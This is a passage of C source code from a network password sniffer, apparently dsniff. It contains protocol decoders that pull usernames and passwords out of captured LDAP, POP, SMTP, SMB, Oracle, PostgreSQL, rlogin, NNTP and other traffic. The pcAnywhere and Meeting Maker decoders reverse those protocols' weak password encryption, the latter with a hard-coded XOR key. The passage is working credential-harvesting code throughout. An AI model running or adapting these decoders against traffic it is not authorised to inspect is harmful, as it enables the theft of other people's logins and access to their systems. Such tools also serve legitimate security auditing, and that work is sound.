		else if (buf_cmp(line, "MODE ", 5) == 0 &&
			 buf_index(line, " +k ", 4) != -1) {
			buf_rewind(line);
			buf_putf(&outbuf, "%s\n", buf_ptr(line));
			got_auth = 1;
		}
		else if (buf_cmp(line, "JOIN ", 5) == 0) {
			buf_skip(line, 5);
			if ((i = buf_index(line, " ", 1)) < 0)
				continue;
			buf_skip(line, i + 1);
			if (buf_len(line) < 1)
				continue;
			buf_rewind(line);
			buf_putf(&outbuf, "%s\n", buf_ptr(line));
			got_auth = 1;
		}
	}
	buf_end(&outbuf);

	return (got_auth ? buf_len(&outbuf) : 0);
}

--------------------------------------------------------------------------------
/decode_ldap.c:
--------------------------------------------------------------------------------
/*
 * decode_ldap.c
 *
 * Lightweight Directory Access Protocol.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_ldap.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $
 */

#include "config.h"

#include

#include
#include

#include "buf.h"
#include "asn1.h"
#include "decode.h"

int
decode_ldap(u_char *buf, int len, u_char *obuf, int olen)
{
	struct buf *msg, inbuf, outbuf;
	int i, type;
	u_char *p;

	buf_init(&inbuf, buf, len);
	buf_init(&outbuf, obuf, olen);

	while (buf_len(&inbuf) > 10) {
		/* LDAPMessage */
		type = asn1_type(&inbuf);
		i = asn1_len(&inbuf);

		if (i <= 0 || (msg = buf_tok(&inbuf, NULL, i)) == NULL)
			break;

		if (type != ASN1_SEQUENCE)
			continue;

		/* messageID */
		type = asn1_type(msg);
		i = asn1_len(msg);
		if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0)
			continue;

		/* bindRequest op - APPLICATION[0] SEQUENCE */
		if (buf_cmp(msg, "\x60", 1) != 0)
			continue;
		asn1_type(msg);
		asn1_len(msg);

		/* version */
		type = asn1_type(msg);
		i = asn1_len(msg);
		if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0)
			continue;

		/* name */
		type = asn1_type(msg);
		i = asn1_len(msg);
		p = buf_ptr(msg);
		if (type != ASN1_STRING || i <= 0 || buf_skip(msg, i) < 0)
			continue;

		/* simple auth [0] */
		if (buf_cmp(msg, "\x80", 1) != 0)
			continue;
		*(buf_ptr(msg)) = '\0';
		buf_skip(msg, 1);

		/* passwd */
		i = asn1_len(msg);

		if (i <= 0 || i > buf_len(msg))
			continue;

		if (buf_tell(&outbuf) > 0)
			buf_put(&outbuf, "\n", 1);
		buf_putf(&outbuf, "%s\n", p);
		buf_put(&outbuf, buf_ptr(msg), i);
		buf_put(&outbuf, "\n", 1);
	}
	buf_end(&outbuf);

	return (buf_len(&outbuf));
}

--------------------------------------------------------------------------------
/decode_mmxp.c:
--------------------------------------------------------------------------------
/*
 * decode_mmxp.c
 *
 * Meeting Maker.
 *
 * Thanks to Matt Power for his BUGTRAQ post
 * on Meeting Maker encryption, and for providing me with traffic traces.
 *
 * The encryption algorithm seems to be much simpler than what Matt
 * reversed - see below...
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_mmxp.c,v 1.8 2001/03/15 08:33:01 dugsong Exp $
 */

#include "config.h"

#include
#include

#include
#include
#include

#include "buf.h"
#include "decode.h"

#define MM_SECRET	"Thisisastupidwasteoftimeandspace"

static u_char *mm_xor = MM_SECRET;

int
decode_mmxp(u_char *buf, int len, u_char *obuf, int olen)
{
	struct buf inbuf, outbuf;
	u_char *p, c;
	u_int32_t i;
	int encrypt;

	buf_init(&inbuf, buf, len);
	/* Bound the output buffer by its own size, not by the input length. */
	buf_init(&outbuf, obuf, olen);

	while ((i = buf_index(&inbuf, "\x00\x00\x24\x55", 4)) != -1) {
		buf_skip(&inbuf, i + 4);

		if (buf_cmp(&inbuf, "\x7f\xff", 2) == 0)
			encrypt = 1;
		else if (buf_cmp(&inbuf, "\xff\xff", 2) == 0)
			encrypt = 0;
		else continue;

		buf_skip(&inbuf, 4);

		/* LPPPg? */
		if (buf_get(&inbuf, &i, sizeof(i)) < 0)
			break;

		i = ntohl(i);
		if (buf_skip(&inbuf, i + 4 + 4) < 0)
			continue;

		/* Server. */
		if (buf_get(&inbuf, &c, 1) != 1) break;
		if (buf_len(&inbuf) < c) break;

		buf_put(&outbuf, buf_ptr(&inbuf), c);
		buf_put(&outbuf, "\n", 1);
		buf_skip(&inbuf, c + 4);

		/* Username. */
		if (buf_get(&inbuf, &c, 1) != 1) break;
		if (buf_len(&inbuf) < c) break;

		buf_put(&outbuf, buf_ptr(&inbuf), c);
		buf_put(&outbuf, "\n", 1);
		buf_skip(&inbuf, c + 4);

		/* Password.
		 */
		if (buf_get(&inbuf, &c, 1) != 1) break;
		if (buf_len(&inbuf) < c) break;

		p = buf_ptr(&inbuf);

		if (encrypt) {
			for (i = 0; i < c; i++)
				p[i] ^= mm_xor[i % (sizeof(MM_SECRET) - 1)];
		}
		buf_put(&outbuf, p, c);
		buf_put(&outbuf, "\n", 1);
	}
	buf_end(&outbuf);

	return (buf_len(&outbuf));
}

--------------------------------------------------------------------------------
/decode_mountd.c:
--------------------------------------------------------------------------------
/*
 * decode_mountd.c
 *
 * RPC mountd.
 *
 * Outputs filehandle in nfsshell format. :-)
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_mountd.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $
 */

#include "config.h"

#include
#include
#include

#include
#include
#include

#include "buf.h"
#include "mount.h"
#include "rpc.h"
#include "decode.h"

int
decode_mountd(u_char *buf, int len, u_char *obuf, int olen)
{
	XDR xdrs;
	struct buf outbuf;
	struct rpc_msg msg;
	struct xid_map *xm;
	struct fhstatus fhstat;
	char *p, *dir;
	int i, hdrlen;

	buf_init(&outbuf, obuf, olen);

	if ((hdrlen = rpc_decode(buf, len, &msg)) == 0)
		return (0);

	if (msg.rm_direction == CALL &&
	    msg.rm_call.cb_prog == MOUNTPROG &&
	    msg.rm_call.cb_proc == MOUNTPROC_MNT) {
		xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE);
		dir = NULL;
		if (xdr_string(&xdrs, &dir, MAXPATHLEN)) {
			xid_map_enter(msg.rm_xid, MOUNTPROG, MOUNTVERS,
				      MOUNTPROC_MNT, (void *) dir);
		}
		xdr_destroy(&xdrs);
	}
	else if (msg.rm_direction == REPLY &&
		 (xm = xid_map_find(msg.rm_xid)) != NULL) {
		if (msg.rm_reply.rp_stat == MSG_ACCEPTED &&
		    msg.acpted_rply.ar_stat == SUCCESS) {
			xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen,
				      XDR_DECODE);
			if (xdr_fhstatus(&xdrs, &fhstat)) {
				if (fhstat.fhs_status == 0) {
					buf_putf(&outbuf, "%s [",
						 (char *)xm->data);

					p = fhstat.fhstatus_u.fhs_fhandle;

					for (i = 0; i < FHSIZE; i++) {
						buf_putf(&outbuf, "%.2x ",
							 p[i] & 0xff);
					}
					buf_put(&outbuf, "]\n", 2);
				}
			}
			xdr_destroy(&xdrs);
		}
		free(xm->data);
		memset(xm, 0, sizeof(*xm));
	}
	buf_end(&outbuf);

	return (buf_len(&outbuf));
}

--------------------------------------------------------------------------------
/decode_napster.c:
--------------------------------------------------------------------------------
/*
 * decode_napster.c
 *
 * Napster. w00w00!
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_napster.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $
 */

#include "config.h"

#include

#include
#include

#include "buf.h"
#include "decode.h"

int
decode_napster(u_char *buf, int len, u_char *obuf, int olen)
{
	struct buf inbuf, outbuf;
	u_short i, type;

	buf_init(&inbuf, buf, len);
	buf_init(&outbuf, obuf, olen);

	if (buf_get(&inbuf, &i, sizeof(i)) != sizeof(i))
		return (0);

	i = pletohs(&i);

	if (buf_get(&inbuf, &type, sizeof(type)) != sizeof(type))
		return (0);

	type = pletohs(&type);

	if (type != 2 || i > buf_len(&inbuf))
		return (0);

	buf_put(&outbuf, buf_ptr(&inbuf), i);
	buf_put(&outbuf, "\n", 1);

	buf_end(&outbuf);

	return (buf_len(&outbuf));
}

--------------------------------------------------------------------------------
/decode_nntp.c:
--------------------------------------------------------------------------------
/*
 * decode_nntp.c
 *
 * Network News Transport Protocol.
 *
 * Copyright (c) 2000 Felix von Leitner
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_nntp.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $
 */

#include "config.h"

#include

#include
#include
#include

#include "base64.h"
#include "decode.h"

int
decode_nntp(u_char *buf, int len, u_char *obuf, int olen)
{
	char *p;
	int i, simple, dpa;

	obuf[0] = '\0';
	simple = dpa = 0;

	for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
		if (simple == 1) {
			strlcat(obuf, p, olen);
			strlcat(obuf, "\n", olen);
			simple = 0;
		}
		else if (strncasecmp(p, "AUTHINFO ", 9) == 0) {
			strlcat(obuf, p, olen);

			if (strncasecmp(p + 9, "SIMPLE", 6) == 0) {
				simple = 1;
			}
			else if (strncasecmp(p + 9, "GENERIC ", 8) == 0) {
				if (strncasecmp(p + 17, "DPA", 3) == 0) {
					dpa = 1;
				}
				else if (dpa == 1) {
					p += 17;
					i = base64_pton(p, p, strlen(p));
					p[i] = '\0';
					i = strlen(obuf);
					snprintf(obuf + i, olen - i,
						 " [%s]", p);
				}
			}
			strlcat(obuf, "\n", olen);
		}
	}
	return (strlen(obuf));
}

--------------------------------------------------------------------------------
/decode_oracle.c:
--------------------------------------------------------------------------------
/*
 * decode_oracle.c
 *
 * Oracle SQL*Net v2/Net8.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_oracle.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $
 */

#include "config.h"

#include

#include
#include

#include "decode.h"

/* XXX - dag nasty. anyone have protocol specs?
 */
int
decode_oracle(u_char *buf, int len, u_char *obuf, int olen)
{
	u_char *p, *q;
	u_short i, j;
	int gotauth = 0;

	p = buf;

	i = pntohs(p);
	if (i >= len) return (0);

	if (i < 60) {	/* XXX - skip unknown "empty" packet */
		p += i;
		i = pntohs(p);
		if (p + i > buf + len) return (0);
	}
	/* Save TNS connect string. */
	p[i] = '\0';
	for (q = p + i; q > p && q[-1] != '\0'; q--)
		;
	snprintf(obuf, olen, "%s\n", q);
	p += i;

	/* XXX - skip initial username message. */
	if ((p = bufbuf(p, len, "(TNS V", 6)) == NULL) return (0);
	if ((i = len - (p - buf)) <= 0) return (0);
	if ((p = memchr(p, ')', i)) == NULL) return (0);

	/* Parse auth messages. */
	for (p++; p - buf < len; p += i) {
		i = pntohs(p);
		if (p + i > buf + len || i < 120)
			break;

		if (memcmp(p + 4, "\x06\x00\x00\x00\x00\x00\x03\x3a", 8) != 0)
			continue;

		for (q = p + i; q > p && q[-1] != '\0'; q--)
			;
		j = pntohs(p + 19);
		if (q + j > buf + len)
			return (0);
		q[j] = '\0';

		j = strlen(obuf);
		/* Only olen - j bytes remain after the j bytes already written. */
		snprintf(obuf + j, olen - j, "%s\n", p + 117);
		gotauth++;
	}
	return (gotauth ? strlen(obuf) : 0);
}

--------------------------------------------------------------------------------
/decode_ospf.c:
--------------------------------------------------------------------------------
/*
 * decode_ospf.c
 *
 * Open Shortest Path First.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_ospf.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $
 */

#include "config.h"

#include

#include
#include

#include "decode.h"

int
decode_ospf(u_char *buf, int len, u_char *obuf, int olen)
{
	if (len < 25)
		return (0);

	if (pntohs(buf + 14) != 1)
		return (0);

	buf[24] = '\0';

	return (snprintf(obuf, olen, "%s\n", buf + 16));
}

--------------------------------------------------------------------------------
/decode_pcanywhere.c:
--------------------------------------------------------------------------------
/*
 * decode_pcanywhere.c
 *
 * Symantec pcAnywhere.
 *
 * Thanks to Pascal Longpre for his BUGTRAQ post
 * on pcAnywhere encryption, and for providing me with traffic traces.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_pcanywhere.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $
 */

#include "config.h"

#include

#include
#include

#include "buf.h"
#include "decode.h"

int
decode_pcanywhere(u_char *buf, int len, u_char *obuf, int olen)
{
	struct buf *word, inbuf, outbuf;
	u_char *p, c;
	int i;

	buf_init(&inbuf, buf, len);
	buf_init(&outbuf, obuf, olen);

	/* Skip leading zero bytes. */
	while (buf_get(&inbuf, &c, 1) == 1) {
		if (c != 0) break;
	}
	/* Version 7, no encryption */
	if (c < 0x0f && c != 0x06 /* jic */) {
		while ((word = buf_tok(&inbuf, "\r", 1)) != NULL) {
			if (buf_ptr(word)[0] == 0x6f)
				break;
			buf_putf(&outbuf, "%.*s\n",
				 buf_len(word), buf_ptr(word));
		}
	}
	/* Version 9, encrypted */
	else {
		/* Skip optional \x6f command packets.
		 */
		while ((i = buf_index(&inbuf, "\x06", 1)) >= 0) {
			buf_skip(&inbuf, i);
			if (buf_len(&inbuf) > 2 && buf_ptr(&inbuf)[1] != 0xff)
				break;
			buf_skip(&inbuf, 2);
		}
		/* Parse \x06 auth packets. */
		while (buf_cmp(&inbuf, "\x06", 1) == 0) {
			buf_skip(&inbuf, 1);

			if (buf_get(&inbuf, &c, 1) != 1)
				break;

			if (buf_len(&inbuf) < c)
				break;

			p = buf_ptr(&inbuf);
			buf_skip(&inbuf, c);

			for (i = c - 1; i > 0; i--) {
				p[i] = p[i - 1] ^ p[i] ^ (i - 1);
			}
			p[0] ^= 0xab;

			buf_putf(&outbuf, "%.*s\n", c, p);
		}
	}
	buf_end(&outbuf);

	return (buf_len(&outbuf));
}

--------------------------------------------------------------------------------
/decode_pop.c:
--------------------------------------------------------------------------------
/*
 * decode_pop.c
 *
 * Post Office Protocol.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_pop.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $
 *
 * Rewritten by Stefan Tomanek 2011
 */

#include "config.h"

#include

#include
#include
#include

#include "base64.h"
#include "options.h"
#include "decode.h"

extern struct _dc_meta dc_meta;

int
decode_poppass(u_char *buf, int len, u_char *obuf, int olen)
{
	char *p;

	obuf[0] = '\0';

	for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
		if (strncasecmp(p, "user ", 5) == 0 ||
		    strncasecmp(p, "pass ", 5) == 0 ||
		    strncasecmp(p, "newpass ", 8) == 0) {
			strlcat(obuf, p, olen);
			strlcat(obuf, "\n", olen);
		}
	}
	if (strip_lines(obuf, Opt_lines) < 3)
		return (0);

	return (strlen(obuf));
}

int
decode_pop(u_char *buf, int len, u_char *obuf, int olen)
{
	char *p;
	char *s;
	int n;
	int i, j;
	char *user;
	char
		*password;
	enum {
		NONE,
		AUTHPLAIN,
		AUTHLOGIN,
		USERPASS
	} mode = NONE;


	obuf[0] = '\0';

	for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
		if (mode == NONE) {
			user = NULL;
			password = NULL;
			if (strncasecmp(p, "AUTH PLAIN", 10) == 0) {
				mode = AUTHPLAIN;
				continue;
			}
			if (strncasecmp(p, "AUTH LOGIN", 10) == 0) {
				mode = AUTHLOGIN;
				continue;
			}
			if (strncasecmp(p, "USER ", 5) == 0) {
				mode = USERPASS;
				/* the traditional login cuts right to the chase,
				 * so no continue here
				 */
			}
		}
		if (mode == USERPASS) {
			if (strncasecmp(p, "USER ", 5) == 0) {
				user = &p[5];
			} else if (strncasecmp(p, "PASS ", 5) == 0) {
				password = &p[5];
			}
		}

		if (mode == AUTHPLAIN) {
			decode_authplain(p, &user, &password);
		}

		if (mode == AUTHLOGIN) {
			j = base64_pton(p, p, strlen(p));
			p[j] = '\0';
			if (!user) {
				user = p;
			} else {
				password = p;
				/* got everything we need :-) */
			}
		}

		if (user && password) {
			strlcat(obuf, "username [", olen);
			strlcat(obuf, user, olen);
			strlcat(obuf, "] password [", olen);
			strlcat(obuf, password, olen);
			strlcat(obuf, "]\n", olen);
			dc_meta.is_hot = 1;

			mode = NONE;
		}
	}
	return (strlen(obuf));
}

--------------------------------------------------------------------------------
/decode_portmap.c:
--------------------------------------------------------------------------------
/*
 * decode_portmap.c
 *
 * RPC portmap.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_portmap.c,v 1.8 2001/03/15 08:33:02 dugsong Exp $
 */

#include "config.h"

#include
#include
#include

#include
#include
#include
#include

#include "rpc.h"
#include "trigger.h"
#include "decode.h"

int
decode_portmap(u_char *buf, int len, u_char *obuf, int olen)
{
	XDR xdrs;
	struct rpc_msg msg;
	struct pmap *pm, pmap;
	struct xid_map *xm;
	int hdrlen;

	if ((hdrlen = rpc_decode(buf, len, &msg)) == 0)
		return (0);

	if (msg.rm_direction == CALL &&
	    msg.rm_call.cb_prog == PMAPPROG &&
	    msg.rm_call.cb_proc == PMAPPROC_GETPORT) {
		xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE);
		if (xdr_pmap(&xdrs, &pmap)) {
			if ((pm = malloc(sizeof(*pm))) != NULL) {
				*pm = pmap;
				xid_map_enter(msg.rm_xid, PMAPPROG, PMAPVERS,
					      PMAPPROC_GETPORT, (void *) pm);
			}
		}
		xdr_destroy(&xdrs);
	}
	else if (msg.rm_direction == REPLY &&
		 (xm = xid_map_find(msg.rm_xid)) != NULL) {
		if (msg.rm_reply.rp_stat == MSG_ACCEPTED &&
		    msg.acpted_rply.ar_stat == SUCCESS) {
			pm = (struct pmap *)xm->data;
			xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen,
				      XDR_DECODE);
			if (xdr_u_long(&xdrs, &pm->pm_port)) {
				trigger_rpc(pm->pm_prog, pm->pm_prot,
					    pm->pm_port);
				trigger_rpc(pm->pm_prog, pm->pm_prot,
					    0 - (int) pm->pm_port);
			}
			xdr_destroy(&xdrs);
		}
		free(xm->data);
		memset(xm, 0, sizeof(*xm));
	}
	return (0);
}

--------------------------------------------------------------------------------
/decode_postgresql.c:
--------------------------------------------------------------------------------
/*
 * decode_postgresql.c
 *
 * PostgreSQL.
 *
 * Thanks to Eric Jackson for packet traces.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_postgresql.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $
 */

#include "config.h"

#include

#include
#include

#include "decode.h"

#define STARTUP_PKTLEN	296

int
decode_postgresql(u_char *buf, int len, u_char *obuf, int olen)
{
	u_int32_t plen;
	u_char *p;
	char *db, *user;

	if (len < STARTUP_PKTLEN)
		return (0);

	obuf[0] = '\0';
	db = user = NULL;

	for (;;) {
		if (len < 4) break;
		plen = pntohl(buf);

		/*
		 * A length below 4 cannot cover its own length field: it
		 * would stall the loop and make buf[plen - 1] index
		 * outside the packet.
		 */
		if (plen < 4 || plen > len) break;
		p = buf + 4;

		if (plen == STARTUP_PKTLEN) {
			if (pntohl(p) >> 16 == 2) {
				db = p + 4; db[63] = '\0';
				user = db + 64; user[31] = '\0';
			}
		}
		else if (db != NULL && user != NULL) {
			buf[plen - 1] = '\0';
			snprintf(obuf + strlen(obuf),
				 olen - strlen(obuf),
				 "%s\n%s\n%s\n", db, user, p);
			db = user = NULL;
		}
		buf += plen;
		len -= plen;
	}
	return (strlen(obuf));
}

--------------------------------------------------------------------------------
/decode_rip.c:
--------------------------------------------------------------------------------
/*
 * decode_rip.c
 *
 * Routing Information Protocol.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_rip.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $
 */

#include "config.h"

#include

#include
#include

#include "decode.h"

int
decode_rip(u_char *buf, int len, u_char *obuf, int olen)
{
	if (len < 21)
		return (0);

	/* Version 2 simple password authentication.
	 */
	if (buf[1] != 2 || memcmp(buf + 4, "\xff\xff\x00\x02", 4) != 0)
		return (0);

	buf[20] = '\0';

	return (snprintf(obuf, olen, "%s\n", buf + 20));
}

--------------------------------------------------------------------------------
/decode_rlogin.c:
--------------------------------------------------------------------------------
/*
 * decode_rlogin.c
 *
 * Berkeley remote login/shell/exec.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_rlogin.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $
 */

#include "config.h"

#include

#include
#include
#include
#include

#include "options.h"
#include "decode.h"

int
decode_rlogin(u_char *buf, int len, u_char *obuf, int olen)
{
	u_char *p, *q;

	/* Skip first NULL, or rexec stderr port */
	for (p = buf; p - buf < len && *p == '\0'; p++)
		; /* VOID */

	strlcpy(obuf, "[", olen);
	strlcat(obuf, p, olen);		/* Local username */
	strlcat(obuf, ":", olen);
	p += strlen(p) + 1;

	strlcat(obuf, p, olen);		/* Remote username */
	strlcat(obuf, "]\n", olen);
	p += strlen(p) + 1;

	p += strlen(p) + 1;		/* Skip term info */

	if ((q = strstr(p, "\xff\xffss")) != NULL)	/* Skip window size */
		p += 12;

	for (p = strtok(p, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
		strlcat(obuf, p, olen);
		strlcat(obuf, "\n", olen);
	}
	if (!strip_lines(obuf, Opt_lines))
		return (0);

	return (strlen(obuf));
}

--------------------------------------------------------------------------------
/decode_smb.c:
--------------------------------------------------------------------------------
/*
 * decode_smb.c
 *
 * Microsoft Server Message Block.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_smb.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $
 */

#include "config.h"

#include
#include

#include
#include
#include

#include "decode.h"

struct smbhdr {
	u_char proto[4];
	u_char cmd;
	u_char err[4];
	u_char flags1;
	u_short flags2;
	u_short pad[6];
	u_short tid, pid, uid, mid;
};

int
decode_smb(u_char *buf, int len, u_char *obuf, int olen)
{
	struct smbhdr *smb;
	int i, j, k;
	u_char *p, *q, *end;
	char *user, *pass;

	obuf[0] = '\0';

	/* Skip NetBIOS session request. */
	if (len < 4 || buf[0] != 0x81) return (0);
	buf += 2;
	GETSHORT(i, buf); len -= 4;
	if (len < i) return (0);
	buf += i; len -= i;
	end = buf + len;

	/* Parse SMBs. */
	for (p = buf; p < end; p += i) {
		GETLONG(i, p);
		if (i > end - p || i < sizeof(*smb) + 32)
			continue;

		smb = (struct smbhdr *)p;
		if (memcmp(smb->proto, "\xffSMB", 4) != 0 || smb->cmd != 0x73)
			continue;

		user = pass = NULL;
		q = (u_char *)(smb + 1);

		if (*q == 10) {		/* Pre NT LM 0.12 */
			q += 15; j = pletohs(q); q += 2;
			if (j > i - (sizeof(*smb) + 15 + 6))
				continue;
			pass = q + 6;
			user = pass + j;
		}
		else if (*q == 13) {	/* NT LM 0.12 */
			q += 15; j = pletohs(q);
			q += 2; k = pletohs(q);
			if (j > i - ((q - p) + 12) || k > i - ((q - p) + 11))
				continue;
			pass = q + 12;
			user = pass + j + k;
		}
		else continue;

		/* XXX - skip null IPC sessions, etc.
		 */
		if (user && pass && strlen(user) &&
		    is_ascii_string(pass, j - 1)) {
			strlcat(obuf, user, olen);
			strlcat(obuf, " ", olen);
			strlcat(obuf, pass, olen);
			strlcat(obuf, "\n", olen);
		}
	}
	return (strlen(obuf));
}

--------------------------------------------------------------------------------
/decode_smtp.c:
--------------------------------------------------------------------------------
/*
 * decode_smtp.c
 *
 * Simple Mail Transfer Protocol.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_smtp.c,v 1.3 2001/03/15 08:33:02 dugsong Exp $
 */

#include "config.h"

#include

#include
#include
#include

#include "base64.h"
#include "options.h"
#include "decode.h"

extern struct _dc_meta dc_meta;

int
decode_smtp(u_char *buf, int len, u_char *obuf, int olen)
{
	char *p, *s;
	int i, j, login = 0;
	int found = 0;

	obuf[0] = '\0';
	for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) {
		if ((strncmp(p, "MAIL ", 5) == 0) || (strncmp(p, "RCPT ", 5) == 0)) {
			if (!Opt_verbose)
				break;
			if (obuf[0] != '\0')
				strlcat(obuf, "\n", olen);
			strlcat(obuf, p+5, olen);
			if (++found >= 2)
				break;
			continue;
		}
		if ((strncmp(p, "DATA", 4) == 0) || (strncmp(p, "QUIT", 4) == 0))
			break;

		if (login == 0) {
			if (strncmp(p, "AUTH LOGIN", 10) != 0)
				continue;

			strlcat(obuf, p, olen);
			p += 10;
			i = base64_pton(p, p, strlen(p));
			if (i > 0) {
				p[i] = '\0';
				j = strlen(obuf);
				snprintf(obuf + j, olen - j, " [%s]", p);
			} else {
				strlcat(obuf, " ", olen);
				login = 1;
			}
			dc_meta.is_hot = 1;
			continue;
		}

		strlcat(obuf, p, olen);
		// USER:
		// PASS:
		//
		if ((s = strchr(p, ' ')) != NULL)
			p = ++s;
		i = base64_pton(p, p, strlen(p));
		if (i > 0) {
			p[i] = '\0';
			j = strlen(obuf);
			snprintf(obuf + j, olen - j, " [%s] ", p);
		}
	}
	return (strlen(obuf));
}

--------------------------------------------------------------------------------
/decode_sni.c:
--------------------------------------------------------------------------------
#include "config.h"

#include
#include

#include
#include
#include
#include
#include
#include

#include "options.h"
#include "decode.h"

extern struct _dc_meta dc_meta;

struct tls_hdr {
	uint8_t proto;
	uint16_t vers;
	uint16_t len;
} __attribute__((packed));

struct tls_ch {
	uint8_t type;
	uint8_t len[3];
	uint16_t version; /// 03 03 for TLS 1.2 and TLS 1.3
	uint8_t random[32];
	uint8_t sid_len;
} __attribute__((packed));

struct tls_ex {
	uint16_t type;
	uint16_t len;
} __attribute__((packed));

int
decode_sni(u_char *buf, int len, u_char *obuf, int olen) {
	u_char *end = buf + len;
	u_char *ptr = buf;
	struct tls_hdr *t = (struct tls_hdr *)buf;
	struct tls_ch *ch;
	uint16_t hls;
	uint16_t type;
	u_char *str;
	char dom[1024];

	if (!Opt_verbose)
		return 0;

	if (len <= sizeof (struct tls_hdr) + sizeof (struct tls_ch) /* + sid_len */ + sizeof (struct tls_ex))
		return 0;

	memcpy(&hls, &t->len, 2);
	hls = ntohs(hls);
	memset(&t->len, 0, 2);

	if (memcmp(buf, "\x16\x03\x01\x00\x00\x01", 6) != 0)
		return 0;

	// Skip TLS header
	ptr += sizeof *t;
	if (end - ptr < sizeof *ch)
		return 0;
	ch = (struct tls_ch *)ptr;
	// Skip fixed ClientHello
	if (ptr[5] != 0x03) // ch->version[1]
		return 0;
	ptr += sizeof *ch;
	ptr += ch->sid_len; // Skip Session-ID
	if (ptr + 2 > end) // Need 2 bytes for the Cipher Suites length
		return 0;

	memcpy(&hls, ptr, 2);
	hls = ntohs(hls);
	ptr += hls
		+ 2; // Skip length + Cipher Suites
	if (ptr >= end)
		return 0;

	ptr += (ptr[0] + 1); // Skip length + Compression Methods

	if (ptr + 2 >= end)
		return 0;
	memcpy(&hls, ptr, 2);
	hls = ntohs(hls);
	ptr += 2;

	// Ignore garbage after extensions (should not be any)
	if (ptr + hls < end)
		end = ptr + hls;
	// Iterate through all TLS extensions until we find SNI.
	while (1) {
		if (ptr + sizeof (struct tls_ex) + 2 /* SNI List Length */ + 1 /* SNI Type */ >= end)
			goto err;

		memcpy(&type, ptr, 2);
		type = ntohs(type);
		if (type != 0) {
			memcpy(&hls, ptr + 2, 2);
			hls = ntohs(hls);
			ptr += sizeof (struct tls_ex) + hls;
			continue;
		}
		// SNI
		ptr += sizeof (struct tls_ex);

		ptr += 2; // List Length.
		if (ptr >= end)
			goto err;
		if (*ptr != 0x00)
			goto err;
		ptr += 1; // SN Type.
		if (ptr + 2 >= end)
			goto err;
		memcpy(&hls, ptr, 2);
		hls = ntohs(hls);
		ptr += 2; // SN Length

		if (ptr + hls + 1 >= end) // SNI is never the last. Make sure there is room for the \0.
			goto err;

		str = ascii_string(ptr, hls + 1);
		if (Opt_color) {
			snprintf(obuf, olen, CDY"SNI"CN": %s", color_domain(dom, sizeof dom, str));
		} else
			snprintf(obuf, olen, "SNI: %s", str);

		break;
	}

	return (strlen(obuf));
err:
	if (Opt_debug)
		warnx("TLS 1.2/1.3 without SNI");
	return 0;
}

--------------------------------------------------------------------------------
/decode_sniffer.c:
--------------------------------------------------------------------------------
/*
 * decode_sniffer.c
 *
 * Network Associates Sniffer.
 *
 * Copyright (c) 2000 Anonymous
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_sniffer.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $
 */

#include "config.h"

#include

#include
#include
#include
#include

#include "base64.h"
#include "decode.h"

int
decode_sniffer(u_char *buf, int len, u_char *obuf, int olen)
{
	u_int i, opcode;

	if (len < 36 || buf[0] != 5)
		return (0);

	opcode = pletohs(&buf[6]);

	if (opcode == 260) {
		if (buf[32] == 0)
			return (strlcpy(obuf, "[]\n", olen));
	}
	else if (opcode == 261) {
		if (pletohl(&buf[32]) == -1)
			return (strlcpy(obuf, "[]\n", olen));
	}
	else return (0);

	buf[len - 3] = '\0'; strtok(&buf[32], "\r\n");
	snprintf(obuf, olen, "%s [", &buf[32]);
	len = strlen(obuf);
	i = base64_pton(&buf[32], &obuf[len], olen - len - 3);
	obuf[len + i] = '\0';
	strlcat(obuf, "]\n", olen);

	return (strlen(obuf));
}

--------------------------------------------------------------------------------
/decode_snmp.c:
--------------------------------------------------------------------------------
/*
 * decode_snmp.c
 *
 * Simple Network Management Protocol.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_snmp.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $
 */

#include "config.h"

#include

#include
#include
#include

#include "buf.h"
#include "asn1.h"
#include "decode.h"

int
decode_snmp(u_char *buf, int len, u_char *obuf, int olen)
{
	struct buf *b, inbuf, outbuf;
	u_char *p, vers;
	int i;

	buf_init(&inbuf, buf, len);
	buf_init(&outbuf, obuf, olen);

	if (asn1_type(&inbuf) != ASN1_SEQUENCE)
		return (0);
	asn1_len(&inbuf);		/* XXX - skip sequence length */

